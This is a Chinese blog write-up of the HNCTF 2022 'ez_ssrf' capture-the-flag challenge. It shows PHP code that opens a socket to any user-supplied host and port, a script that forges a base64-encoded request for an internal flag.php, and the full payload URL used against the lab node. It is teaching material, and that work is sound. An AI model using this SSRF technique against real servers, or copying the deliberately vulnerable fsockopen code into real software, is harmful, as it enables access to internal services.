每日练习-[HNCTF 2022 WEEK2]ez_ssrf

最新推荐文章于 2024-06-10 21:57:03 发布
最新推荐文章于 2024-06-10 21:57:03 发布
阅读量231 收藏
点赞数
文章标签: 前端 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68113265/article/details/132677416
版权 
<?php

highlight_file(__FILE__);
error_reporting(0);

$data=base64_decode($_GET['data']);
$host=$_GET['host'];
$port=$_GET['port'];

$fp=fsockopen($host,intval($port),$error,$errstr,30);
if(!$fp) {
    die();
}
else {
    fwrite($fp,$data);
    while(!feof($data))
    {
        echo fgets($fp,128);
    }
    fclose($fp);
}
fsockopen函数是 PHP 中用于建立网络连接的函数之一。它的作用是创建一个套接字(socket)连接到指定的远程服务器和端口,并返回一个可以用于读写数据的套接字资源。这个函数通常用于客户端与服务器之间的通信

判断成功之后会讲data内容进行写入,这时候就可以进行伪造ssrf。写入我们伪造的请求头

<?php
$out = "GET /flag.php HTTP/1.1\r\n";
$out .= "Host: 127.0.0.1\r\n";
$out .= "Connection: Keep-Alive\r\n\r\n";
echo $out;
echo base64_encode($out)
?>

 payload:

http://node5.anna.nssctf.cn:28832/index.php?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=

He@11
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述 CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-databind 2.x before 2.9.10.8 错误处理了序列化小工具和打字之间的交互,与org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS有关。 CVE-2020-36181:FasterXML jackson-databind 2.x before 2.9.10.8 错误处理了序列化小工具和打字之间的交互,与org.apache.tomcat.dbcp.dbcp.cpdsada
Microsoft_Exchange_Server_SSRF_CVE-2021-26855:Microsoft Exchange Server SSRF防御(CVE-2021-26855)
03-08
Microsoft_Exchange_Server_SSRF_CVE-2021-26855 zoomeye dork:app:“ Microsoft Exchange Server” 使用Seebug工具箱及pocsuite3编写的脚本 ,对近一年的数据进行探测: 成功率大约:1500/5000 = 30%
NSS [HNCTF 2022 WEEK2]ez_ssrf
Jay17的博客
07-04 667
NSS [HNCTF 2022 WEEK2]ez_ssrf
[HNCTF 2022 Week2]
qq_49341576的博客
04-26 696
[HNCTF 2022 Week2]
NSSCTF第8页(2)
wwwwyyyrre的博客
10-23 424
没有环境。
「NGFW」Build_Your_SSRF_Exploit_Framework - 解决方案.zip
11-29
「NGFW」Build_Your_SSRF_Exploit_Framework - 解决方案 安全对抗 基础架构安全 安全集成 漏洞分析 数据库审计
[HNCTF 2022 WEEK2]ez_ssrf
qing_chuan_的博客
07-12 651
这段代码接受通过 GET 请求传递的参数,并使用函数建立与指定主机和端口的 socket 连接。然后,它将传入的 base64 编码的数据解码,并将数据写入到连接的 socket 中。接下来,在循环中,它从连接中读取返回的响应数据,并将其输出到浏览器。建议对该代码进行改进和增强,以提高安全性和代码可靠性。**函数是用于建立一个 socket 连接。
[HNCTF 2022 WEEK2]ez_ssrf题目解析
2201_75327657的博客
10-14 612
函数建立与指定主机和端口的 socket 连接。然后,它将传入的 base64 编码的数据解码,并将数据写入到连接的 socket 中。这题主要是引入ssrf这个漏洞攻击,本质上没有更深入的考察。题目开始给了我们信息让我们去访问index.php。本题是需要我们去伪造一个ssrf的请求头去绕过。
2022 SWPU新生赛&HNCTF web部分题目
weixin_63231007的博客
11-02 3173
SWPU在start.php 界面抓个包,发包得到:F1l1l1l1l1lag.phpThinkPHP V5 rce 漏洞在网上可以找到现成的payload替换whoami命令为我们要执行的命令即可反序列化构造 assert(eval($_POST[1]));cat /flag即可ez_1zpop之后把属性改大一位,绕过__wakeup()函数numgame查看js源码发现了NsScTf.php。
SSRF总结
Aiwin的博客
02-14 714
SSRF总结和一些题目记录(未完结)
[GKCTF2020]EZ三剑客-EzWeb(SSRF)
qq_45521281的博客
06-03 4585
查看源码发现提示: 在url里访问一下: 得到一串ifconfig的结果,整理一下的: eth0 Link encap:Ethernet HWaddr 02:42:ad:62:04:0a inet addr:173.96.119.10 Bcast:173.98.4.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1450 Metric:1 RX pac.
ssrfpll.rar_DQ 锁相环_SSRF-PLL_同步锁相环_锁相环_锁相环 同步
07-14
基于同步坐标系的自建锁相环模块仿真,dq坐标系与matlab自带模块相差90度,新建的dq坐标系是符合中式习惯坐标系
「威胁情报」Build_Your_SSRF_Exploit_Framework_SSRF_漏洞自动化利用 - 渗透测试.zip
12-01
「威胁情报」Build_Your_SSRF_Exploit_Framework_SSRF_漏洞自动化利用 - 渗透测试 业务风控 Android 等级保护 等级保护 安全方案
刷题日记 date 6.9
m0_64348326的博客
06-12 138
但是由于上面可以看见$user=((string)的转换函数还在,所以需要先添加内容后再闭合,否则页面将报错,包括后面的html代码通通需要注释,最后大概变成下面这种形式。毫无疑问是任意文件读取,先读取index.php,多余的前端代码以删除。访问得到flag,这里很坑的一点是,因为CRLF的原因,在最后需要套两次。1.注册登陆后是个沙盒界面,桌面上有个好康的,抓包点击发现。而该变量是通过我们注册时输入的值所可控的,然后和读取到的。函数写shell,文件名知道,主要是文件内容,所以得分析。
初学ssrf(1)
qq_66013948的博客
12-10 956
SSRF,服务端请求伪造,是一种攻击者构造攻击连传给服务器,给服务端执行并发起请求造成安全问题漏洞,一般用来在外网探测或供给内网服务。
HNCTF2022Week2 Reverse WP
Sciurdae的博客
12-01 1356
主要逻辑将userName 做一个md5加密,之后取加密后的数据的奇数位,就是flag。因为没有,反调试以及其他乱七八糟的东西。32bit的程序,点击100000000次就可以得到flag。IDA打开,红色的地址,jz和jnz互补跳转,nop掉E9。64bit的ELF文件,OD当然打不开。做了一个换表的base64编码,找到密文解码一下。先每俩个字符互换位置,再做一个0x30的异或。定位过去后,看汇编,修改cmp或者jg。TEA加密,找到密文和key解密。IDA打开后,查找字符串。先查壳,64bit文件。
[HNCTF 2022 WEEK2]easy_unser
weixin_62306641的博客
11-23 503
因为有个私有变量,所以要url编码,有个_wakeup(),改一下数目。打开发现源码,是反序列化,Url编码之后再改。
Android逆向专题
2302_79135465的博客
05-17 268
passwd:主要是AES/CBC加密。是先转字符然后base58.
JS中一个dom元素能绑定多少事件
最新发布
ggq53219的博客
06-10 514
在JavaScript中,一个DOM元素可以绑定的事件数量并没有明确的限制,这主要取决于浏览器的实现和内存限制。然而,在实际应用中,为同一个DOM元素绑定过多的事件监听器可能会导致性能问题,尤其是在事件处理函数执行复杂操作的情况下。总之,虽然JavaScript中DOM元素可以绑定的事件数量没有明确的限制,但在实际应用中应注意避免过度绑定和优化事件处理函数,以确保良好的性能和用户体验。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值